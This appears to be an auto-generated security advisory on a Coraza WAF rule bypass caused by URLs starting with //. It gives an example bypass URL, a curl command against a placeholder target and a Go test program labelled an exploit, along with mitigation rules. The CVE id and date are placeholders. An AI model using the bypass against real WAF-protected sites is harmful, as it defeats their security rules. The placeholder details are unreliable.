Coraza, Rule Bypass Vulnerability, CVE-2023-XXXX (Critical)

How the Mentioned CVE Works:

The vulnerability in Coraza arises from improper parsing of URLs starting with //. When such a URL is processed, the `REQUEST_FILENAME` variable is incorrectly set, leading to potential rule bypasses. For instance, if a request is made to //bar/uploads/foo.php?a=b, Coraza mistakenly sets `REQUEST_FILENAME` to `/uploads/foo.php` instead of the expected value. This occurs because `url.Parse` interprets `//bar/uploads/foo.php` as an absolute URI with an empty scheme, treating `bar` as the host and `/uploads/foo.php` as the path. This misinterpretation allows attackers to bypass security rules that rely on REQUEST_FILENAME.

DailyCVE Form:

Platform: Coraza WAF
Version: v3
Vulnerability: Rule Bypass
Severity: Critical
Date: 2023-10-XX

What Undercode Say:

Exploitation:

1. Attackers can craft URLs starting with `//` to bypass security rules.

2. Example exploit URL: `//bar/uploads/foo.php?a=b`.

1. Use tools like `curl` to test the vulnerability:

   curl -X GET "http://target.com//bar/uploads/foo.php?a=b"
   

2. Exploit scripts can be written in Go to automate testing:

   package main
   import (
   "fmt"
   "net/url"
   "os"
   "github.com/corazawaf/coraza/v3"
   )
   const testRule = `
   SecDebugLogLevel 9
   SecDebugLog /dev/stdout
   SecRule REQUEST_FILENAME "@rx /bar/uploads/.\.(h?ph(p|tm?l?|ar)|module|shtml)" "id:1,phase:1,deny"
   `
   func main() {
   var testURL = "//bar/uploads/foo.php"
   if os.Getenv("TEST_URL") != "" {
   testURL = os.Getenv("TEST_URL")
   }
   fmt.Printf("Testing URL: %s\n", testURL)
   config := coraza.NewWAFConfig().WithDirectives(testRule)
   waf, err := coraza.NewWAF(config)
   if err != nil {
   panic(err)
   }
   tx := waf.NewTransaction()
   tx.ProcessURI(testURL, "GET", "HTTP/1.1")
   in := tx.ProcessRequestHeaders()
   if in != nil {
   fmt.Printf("%+v\n", in)
   }
   }
   

Protection:

1. Update Coraza to the latest version that addresses this issue.
2. Implement custom parsing logic to correctly handle URLs starting with //.
3. Add additional validation rules to ensure `REQUEST_FILENAME` is correctly set.

4. Example rule to mitigate bypass:

SecRule REQUEST_URI "@rx ^//" "id:2,phase:1,deny,msg:'Invalid URL format'"

5. Regularly audit and test WAF rules to ensure they are effective against bypass attempts.

Analytics:

• Monitor logs for unusual patterns in REQUEST_FILENAME.
• Use intrusion detection systems to flag suspicious URLs.
• Conduct regular penetration testing to identify potential bypass vectors.

Commands:

• Test WAF rules with curl:

  curl -X GET "http://target.com//bar/uploads/foo.php?a=b"
  

• Run the Go exploit script:

  go run exploit.go
  

References:

• Coraza WAF Documentation
• CVE-2023-XXXX Advisory
• OWASP WAF Bypass Techniques

References:

Reported By: https://github.com/advisories/GHSA-q9f5-625g-xm39
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram